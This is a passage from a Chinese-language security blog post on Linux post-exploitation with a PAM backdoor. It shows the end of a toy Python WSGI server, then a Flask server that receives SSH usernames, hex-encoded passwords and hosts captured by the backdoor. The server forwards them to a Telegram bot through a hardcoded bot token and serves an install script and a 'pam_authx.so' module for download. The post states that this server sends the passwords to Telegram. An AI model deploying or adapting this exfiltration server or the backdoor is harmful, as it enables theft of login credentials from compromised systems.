GET</span></span><br><span class="line">         self.path,            <span class="comment"># /hello</span></span><br><span class="line">         self.request_version  <span class="comment"># HTTP/1.1</span></span><br><span class="line">         ) = request_line.split()</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_environ</span><span class="params">(self)</span>:</span></span><br><span class="line">        env = &#123;&#125;</span><br><span class="line">        <span class="comment"># The following code snippet does not follow PEP8 conventions</span></span><br><span class="line">        <span class="comment"># but it's formatted the way it is for demonstration purposes</span></span><br><span class="line">        <span class="comment"># to emphasize the required variables and their values</span></span><br><span class="line">        <span class="comment">#</span></span><br><span class="line">        <span class="comment"># Required WSGI variables</span></span><br><span class="line">        env[<span class="string">'wsgi.version'</span>]      = (<span class="number">1</span>, <span class="number">0</span>)</span><br><span class="line">        env[<span class="string">'wsgi.url_scheme'</span>]   = <span class="string">'http'</span></span><br><span class="line">        env[<span class="string">'wsgi.input'</span>]        = StringIO.StringIO(self.request_data)</span><br><span class="line">        env[<span class="string">'wsgi.errors'</span>]       = sys.stderr</span><br><span class="line">        env[<span class="string">'wsgi.multithread'</span>]  = <span class="literal">False</span></span><br><span class="line">        env[<span class="string">'wsgi.multiprocess'</span>] = <span class="literal">False</span></span><br><span class="line">        env[<span class="string">'wsgi.run_once'</span>]     = <span class="literal">False</span></span><br><span class="line">        <span class="comment"># Required CGI variables</span></span><br><span class="line">        env[<span class="string">'REQUEST_METHOD'</span>]    = self.request_method    <span class="comment"># GET</span></span><br><span class="line">        env[<span class="string">'PATH_INFO'</span>]         = self.path              <span class="comment"># /hello</span></span><br><span class="line">        env[<span class="string">'SERVER_NAME'</span>]       = self.server_name       <span class="comment"># localhost</span></span><br><span class="line">        env[<span class="string">'SERVER_PORT'</span>]       = str(self.server_port)  <span class="comment"># 8888</span></span><br><span class="line">        <span class="keyword">return</span> env</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">start_response</span><span class="params">(self, status, response_headers, exc_info=None)</span>:</span></span><br><span class="line">        <span class="comment"># Add necessary server headers</span></span><br><span class="line">        server_headers = [</span><br><span class="line">            (<span class="string">'Date'</span>, <span class="string">'Tue, 31 Mar 2015 12:54:48 GMT'</span>),</span><br><span class="line">            (<span class="string">'Server'</span>, <span class="string">'WSGIServer 0.2'</span>),</span><br><span class="line">        ]</span><br><span class="line">        self.headers_set = [status, response_headers + server_headers]</span><br><span class="line">        <span class="comment"># To adhere to WSGI specification the start_response must return</span></span><br><span class="line">        <span class="comment"># a 'write' callable. We simplicity's sake we'll ignore that detail</span></span><br><span class="line">        <span class="comment"># for now.</span></span><br><span class="line">        <span class="comment"># return self.finish_response</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">finish_response</span><span class="params">(self, result)</span>:</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            status, response_headers = self.headers_set</span><br><span class="line">            response = <span class="string">'HTTP/1.1 &#123;status&#125;\r\n'</span>.format(status=status)</span><br><span class="line">            <span class="keyword">for</span> header <span class="keyword">in</span> response_headers:</span><br><span class="line">                response += <span class="string">'&#123;0&#125;: &#123;1&#125;\r\n'</span>.format(*header)</span><br><span class="line">            response += <span class="string">'\r\n'</span></span><br><span class="line">            <span class="keyword">for</span> data <span class="keyword">in</span> result:</span><br><span class="line">                response += data</span><br><span class="line">            <span class="comment"># Print formatted response data a la 'curl -v'</span></span><br><span class="line">            print(<span class="string">''</span>.join(</span><br><span class="line">                <span class="string">'&gt; &#123;line&#125;\n'</span>.format(line=line)</span><br><span class="line">                <span class="keyword">for</span> line <span class="keyword">in</span> response.splitlines()</span><br><span class="line">            ))</span><br><span class="line">            self.client_connection.sendall(response)</span><br><span class="line">        <span class="keyword">finally</span>:</span><br><span class="line">            self.client_connection.close()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">SERVER_ADDRESS = (HOST, PORT) = <span class="string">''</span>, <span class="number">8443</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">make_server</span><span class="params">(server_address, application)</span>:</span></span><br><span class="line">    server = WSGIServer(server_address)</span><br><span class="line">    server.set_app(application)</span><br><span class="line">    <span class="keyword">return</span> server</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    <span class="keyword">if</span> len(sys.argv) &lt; <span class="number">2</span>:</span><br><span class="line">        sys.exit(<span class="string">'Provide a WSGI application object as module:callable'</span>)</span><br><span class="line">    app_path = sys.argv[<span class="number">1</span>]</span><br><span class="line">    module, application = app_path.split(<span class="string">':'</span>)</span><br><span class="line">    module = __import__(module)</span><br><span class="line">    application = getattr(module, application)</span><br><span class="line">    httpd = make_server(SERVER_ADDRESS, application)</span><br><span class="line">    print(<span class="string">'WSGIServer: Serving HTTP on port &#123;port&#125; ...\n'</span>.format(port=PORT))</span><br><span class="line">    httpd.serve_forever()</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> send_from_directory</span><br><span class="line"><span class="keyword">import</span> requests,binascii</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="comment"># nohup gunicorn -w 1 -b 0.0.0.0:8443 mikasa:app &gt; /dev/null 2&gt;&amp;1 &amp;</span></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route("/ssh", methods=['POST'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ssh</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">'POST'</span> <span class="keyword">and</span> request.form.get(<span class="string">'msg'</span>):</span><br><span class="line">        msg = request.form.to_dict().get(<span class="string">"msg"</span>)</span><br><span class="line">        msg = msg.split(<span class="string">"::"</span>)</span><br><span class="line">        print(msg[<span class="number">1</span>])</span><br><span class="line">        msg = <span class="string">"host: "</span> + msg[<span class="number">2</span>] + <span class="string">"\nusername: "</span> + msg[<span class="number">0</span>]  + <span class="string">"\npassword: "</span> + str(bytearray.fromhex(msg[<span class="number">1</span>]))</span><br><span class="line">        sendMessage(msg)</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"200"</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route("/download/ssh", methods=['GET'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">downloadssh</span><span class="params">()</span>:</span></span><br><span class="line">    directory = os.getcwd()</span><br><span class="line">    <span class="keyword">return</span> send_from_directory(directory, <span class="string">"install_ssh.sh"</span>, as_attachment=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route("/download/authx", methods=['GET'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">downloadauthx</span><span class="params">()</span>:</span></span><br><span class="line">    directory = os.getcwd()</span><br><span class="line">    <span class="keyword">return</span> send_from_directory(directory, <span class="string">"pam_authx.so"</span>, as_attachment=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sendMessage</span><span class="params">(msg)</span>:</span></span><br><span class="line">    apiKey = <span class="string">"248346092:BAHX0RP9C1x9TV358Fq7I6i4iyR-bOdmJfo"</span></span><br><span class="line">    userId = <span class="string">"14491864"</span></span><br><span class="line">    data = &#123;<span class="string">"chat_id"</span>:userId,<span class="string">"text"</span>:msg&#125;</span><br><span class="line">    url = <span class="string">"https://api.telegram.org/bot&#123;&#125;/sendMessage"</span>.format(apiKey)</span><br><span class="line">    r = requests.post(url,json=data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    app.run(host=<span class="string">'0.0.0.0'</span>, port=<span class="number">8443</span>)</span><br></pre></td></tr></table></figure>
<h2 id="效果"><a class="markdownIt-Anchor" href="#效果"></a> 效果</h2>
<p>我的回源服务器会将密码发送到telegram-bot</p>
<p><img src="pam_tg.gif" alt="pam_tg"></p>
<h2 id="reference"><a class="markdownIt-Anchor" href="#reference"></a> Reference</h2>
<p><a href="http://www.linux-pam.org/Linux-PAM-html/sag-configuration-file.html" target="_blank" rel="noopener">The Linux-PAM configuration file</a><br>
<a href="http://www.linux-pam.org/Linux-PAM-html/Linux-PAM_MWG.html" target="_blank" rel="noopener">The Linux-PAM Module Writers’ Guide</a></p>

            </div>
          

    
      <footer class="post-footer">
		
		<div class="post-tags">
		  
			<a href="/tags/PAM后门/">PAM后门</a>
		  
			<a href="/tags/pam-unix/">pam_unix</a>
		  
			<a href="/tags/Linux/">Linux</a>
		  
			<a href="/tags/后渗透/">后渗透</a>
		  
		</div>
		

        
        
  <nav class="post-nav">
    
      <a class="prev" href="/2018/04/04/渗透中的数据转发技巧/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">渗透中的数据转发技巧</span>
        <span class="prev-text nav-mobile">Prev</span>
      </a>
    
    
      <a class="next" href="/2018/03/24/深信服-SSL-VPN-端口ACL-绕过实践/">
        <span class="next-text nav-default">深信服 SSL VPN 端口ACL 绕过实践</span>
        <span class="prev-text nav-mobile">Next</span>
        <i class="iconfont icon-right"></i>
      </a>
    
  </nav>

        
  <div class="comments" id="comments">
    
    <div style="text-align:center;">
        <button class="btn" id="load-disqus" onclick="disqus.load();">加载 Disqus 评论</button>
    </div>
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


      </footer>
    
  </article>

    </div>

      </div>

      <footer id="colophon"><span class="copyright-year">
    
        &copy;
    
        2015 -
    
    2022
    <span class="footer-author">Gorgias.  <a href="https://gorgias.me/atom.xml">[RSS]</a></span>
    <span class="power-by">
        Powered by <a class="hexo-link" href="https://hexo.io/">Hexo</a> and <a class="theme-link" href="https://github.com/frostfan/hexo-theme-polarbear">Polar Bear</a>
    </span>
</span>

      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>
    

<script type="text/javascript">
  var disqus_shortname = 'gorgiasblog-1';
  var disqus_identifier = '2018/03/25/Linux-后渗透笔记-PAM后门/';

  var disqus_title = "Linux 后渗透笔记 PAM后门";


  var disqus = {
    load : function disqus(){
        if(typeof DISQUS !== 'object') {
          (function () {
          var s = document.createElement('script'); s.async = true;
          s.type = 'text/javascript';
          s.src = '//' + disqus_shortname + '.disqus.com/embed.js';
          (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s);
          }());
          $('#load-disqus').remove(); ///加载后移除按钮
        }
    }
  }

  
    var disqus_config = function () {
        this.page.url = disqus_url;
        this.page.identifier = disqus_identifier;
        this.page.title = disqus_title;
    };
  

</script>


    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  

    <script type="text/javascript" src="/js/src/theme.js?v=1.1"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=1.1"></script>

  </body>
</html>
